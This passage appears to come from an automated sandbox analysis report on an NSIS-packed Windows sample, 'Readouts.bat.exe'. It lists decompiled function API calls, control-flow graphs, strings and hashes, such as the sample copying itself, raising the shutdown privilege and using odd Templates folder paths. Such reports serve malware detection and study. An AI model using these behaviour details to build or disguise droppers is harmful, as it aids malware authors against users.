                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Readouts.bat.exe",00000020,"C:\Users\user\Desktop\Readouts.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                  • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                  • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                                • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                  • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                • ExitProcess.KERNEL32 ref: 004036EE
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Readouts.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Readouts.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Readouts.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Readouts.bat.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                                • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Readouts.bat.exe,00420EA8,?,?,00000006,00000008,0000000A), ref: 004037B1
                                                • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                • ExitProcess.KERNEL32 ref: 00403894
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                • String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon$C:\Users\user\Desktop$C:\Users\user\Desktop\Readouts.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 3441113951-2294702843
                                                • Opcode ID: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                • Opcode Fuzzy Hash: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
                                                • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E
                                                Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 139 40542b-405446 140 4055d5-4055dc 139->140 141 40544c-405513 GetDlgItem * 3 call 404230 call 404b89 GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 405606-405613 140->143 144 4055de-405600 GetDlgItem CreateThread CloseHandle 140->144 163 405531-405534 141->163 164 405515-40552f SendMessageW * 2 141->164 146 405631-40563b 143->146 147 405615-40561b 143->147 144->143 148 405691-405695 146->148 149 40563d-405643 146->149 151 405656-40565f call 404262 147->151 152 40561d-40562c ShowWindow * 2 call 404230 147->152 148->151 157 405697-40569d 148->157 153 405645-405651 call 4041d4 149->153 154 40566b-40567b ShowWindow 149->154 160 405664-405668 151->160 152->146 153->151 161 40568b-40568c call 4041d4 154->161 162 40567d-405686 call 4052ec 154->162 157->151 165 40569f-4056b2 SendMessageW 157->165 161->148 162->161 168 405544-40555b call 4041fb 163->168 169 405536-405542 SendMessageW 163->169 164->163 170 4057b4-4057b6 165->170 171 4056b8-4056e3 CreatePopupMenu call 4062a6 AppendMenuW 165->171 178 405591-4055b2 GetDlgItem SendMessageW 168->178 179 40555d-405571 ShowWindow 168->179 169->168 170->160 176 4056e5-4056f5 GetWindowRect 171->176 177 4056f8-40570d TrackPopupMenu 171->177 176->177 177->170 180 405713-40572a 177->180 178->170 183 4055b8-4055d0 SendMessageW * 2 178->183 181 405580 179->181 182 405573-40557e ShowWindow 179->182 184 40572f-40574a SendMessageW 180->184 185 405586-40558c call 404230 181->185 182->185 183->170 184->184 186 40574c-40576f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->178 188 405771-405798 SendMessageW 186->188 188->188 189 40579a-4057ae GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                • GetClientRect.USER32(?,?), ref: 004054D5
                                                • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                • ShowWindow.USER32(?,00000008), ref: 00405578
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                  • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,?,0040405B), ref: 0040423E
                                                • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                • CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                • ShowWindow.USER32(00000000), ref: 00405624
                                                • ShowWindow.USER32(?,00000008), ref: 00405629
                                                • ShowWindow.USER32(00000008), ref: 00405673
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                • CreatePopupMenu.USER32 ref: 004056B8
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                • GetWindowRect.USER32(?,?), ref: 004056EC
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                • OpenClipboard.USER32(00000000), ref: 0040574D
                                                • EmptyClipboard.USER32 ref: 00405753
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                • CloseClipboard.USER32 ref: 004057AE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {$6B
                                                • API String ID: 590372296-3705917127
                                                • Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                • Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
                                                • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68
                                                Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 499 405996-4059bc call 405c61 502 4059d5-4059dc 499->502 503 4059be-4059d0 DeleteFileW 499->503 505 4059de-4059e0 502->505 506 4059ef-4059ff call 406284 502->506 504 405b52-405b56 503->504 507 405b00-405b05 505->507 508 4059e6-4059e9 505->508 514 405a01-405a0c lstrcatW 506->514 515 405a0e-405a0f call 405ba5 506->515 507->504 510 405b07-405b0a 507->510 508->506 508->507 512 405b14-405b1c call 4065c7 510->512 513 405b0c-405b12 510->513 512->504 523 405b1e-405b32 call 405b59 call 40594e 512->523 513->504 517 405a14-405a18 514->517 515->517 519 405a24-405a2a lstrcatW 517->519 520 405a1a-405a22 517->520 522 405a2f-405a4b lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a51-405a59 522->524 525 405af5-405af9 522->525 539 405b34-405b37 523->539 540 405b4a-405b4d call 4052ec 523->540 527 405a79-405a8d call 406284 524->527 528 405a5b-405a63 524->528 525->507 530 405afb 525->530 541 405aa4-405aaf call 40594e 527->541 542 405a8f-405a97 527->542 531 405a65-405a6d 528->531 532 405ad8-405ae8 FindNextFileW 528->532 530->507 531->527 535 405a6f-405a77 531->535 532->524 538 405aee-405aef FindClose 532->538 535->527 535->532 538->525 539->513 545 405b39-405b48 call 4052ec call 40604a 539->545 540->504 550 405ad0-405ad3 call 4052ec 541->550 551 405ab1-405ab4 541->551 542->532 546 405a99-405aa2 call 405996 542->546 545->504 546->532 550->532 554 405ab6-405ac6 call 4052ec call 40604a 551->554 555 405ac8-405ace 551->555 554->532 555->532
                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 004059BF
                                                • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A07
                                                • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A2A
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A30
                                                • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A40
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                Strings
                                                • "C:\Users\user\Desktop\Readouts.bat.exe", xrefs: 00405996
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059A4
                                                • \*.*, xrefs: 00405A01
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-4083333911
                                                • Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                                • Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                                Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                                • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                                • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                                Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,771B3420,004059B6,?,C:\Users\user~1\AppData\Local\Temp\,771B3420), ref: 004065D2
                                                • FindClose.KERNEL32(00000000), ref: 004065DE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: 8gB
                                                • API String ID: 2295610775-1733800166
                                                • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                                • Instruction ID: 63871ab535fe988d3adb25008cf832d4d85dc6cfcdc2aab035335d2457ba8122
                                                • Opcode Fuzzy Hash: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                                • Instruction Fuzzy Hash: 2BE0D832E08200CFE724DFA5AA4946D77B4EB80314720447FF201F11D1CE7848418F6D
                                                Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 190 403d22-403d34 191 403e75-403e84 190->191 192 403d3a-403d40 190->192 194 403ed3-403ee8 191->194 195 403e86-403ece GetDlgItem * 2 call 4041fb SetClassLongW call 40140b 191->195 192->191 193 403d46-403d4f 192->193 196 403d51-403d5e SetWindowPos 193->196 197 403d64-403d67 193->197 199 403f28-403f2d call 404247 194->199 200 403eea-403eed 194->200 195->194 196->197 202 403d81-403d87 197->202 203 403d69-403d7b ShowWindow 197->203 209 403f32-403f4d 199->209 205 403f20-403f22 200->205 206 403eef-403efa call 401389 200->206 210 403da3-403da6 202->210 211 403d89-403d9e DestroyWindow 202->211 203->202 205->199 208 4041c8 205->208 206->205 221 403efc-403f1b SendMessageW 206->221 216 4041ca-4041d1 208->216 214 403f56-403f5c 209->214 215 403f4f-403f51 call 40140b 209->215 219 403da8-403db4 SetWindowLongW 210->219 220 403db9-403dbf 210->220 217 4041a5-4041ab 211->217 224 403f62-403f6d 214->224 225 404186-40419f DestroyWindow EndDialog 214->225 215->214 217->208 223 4041ad-4041b3 217->223 219->216 226 403e62-403e70 call 404262 220->226 227 403dc5-403dd6 GetDlgItem 220->227 221->216 223->208 231 4041b5-4041be ShowWindow 223->231 224->225 232 403f73-403fc0 call 4062a6 call 4041fb * 3 GetDlgItem 224->232 225->217 226->216 228 403df5-403df8 227->228 229 403dd8-403def SendMessageW IsWindowEnabled 227->229 233 403dfa-403dfb 228->233 234 403dfd-403e00 228->234 229->208 229->228 231->208 260 403fc2-403fc7 232->260 261 403fca-404006 ShowWindow KiUserCallbackDispatcher call 40421d EnableWindow 232->261 237 403e2b-403e30 call 4041d4 233->237 238 403e02-403e08 234->238 239 403e0e-403e13 234->239 237->226 241 403e49-403e5c SendMessageW 238->241 242 403e0a-403e0c 238->242 239->241 243 403e15-403e1b 239->243 241->226 242->237 246 403e32-403e3b call 40140b 243->246 247 403e1d-403e23 call 40140b 243->247 246->226 256 403e3d-403e47 246->256 258 403e29 247->258 256->258 258->237 260->261 264 404008-404009 261->264 265 40400b 261->265 266 40400d-40403b GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050 266->267 268 40403d-40404e SendMessageW 266->268 269 404056-404095 call 404230 call 403d03 call 406284 lstrlenW call 4062a6 SetWindowTextW call 401389 267->269 268->269 269->209 280 40409b-40409d 269->280 280->209 281 4040a3-4040a7 280->281 282 4040c6-4040da DestroyWindow 281->282 283 4040a9-4040af 281->283 282->217 285 4040e0-40410d CreateDialogParamW 282->285 283->208 284 4040b5-4040bb 283->284 284->209 286 4040c1 284->286 285->217 287 404113-40416a call 4041fb GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->208 287->208 292 40416c-40417f ShowWindow call 404247 287->292 294 404184 292->294 294->217
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                • ShowWindow.USER32(?), ref: 00403D7B
                                                • DestroyWindow.USER32 ref: 00403D8F
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                • GetDlgItem.USER32(?,?), ref: 00403E95
                                                • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F0A
                                                • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                • EnableWindow.USER32(?,?), ref: 00403FFE
                                                • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404014
                                                • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404033
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID: 6B
